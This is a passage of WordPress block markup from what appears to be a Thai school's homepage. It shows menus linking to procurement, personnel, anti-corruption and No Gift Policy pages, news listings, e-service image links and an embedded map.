900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb 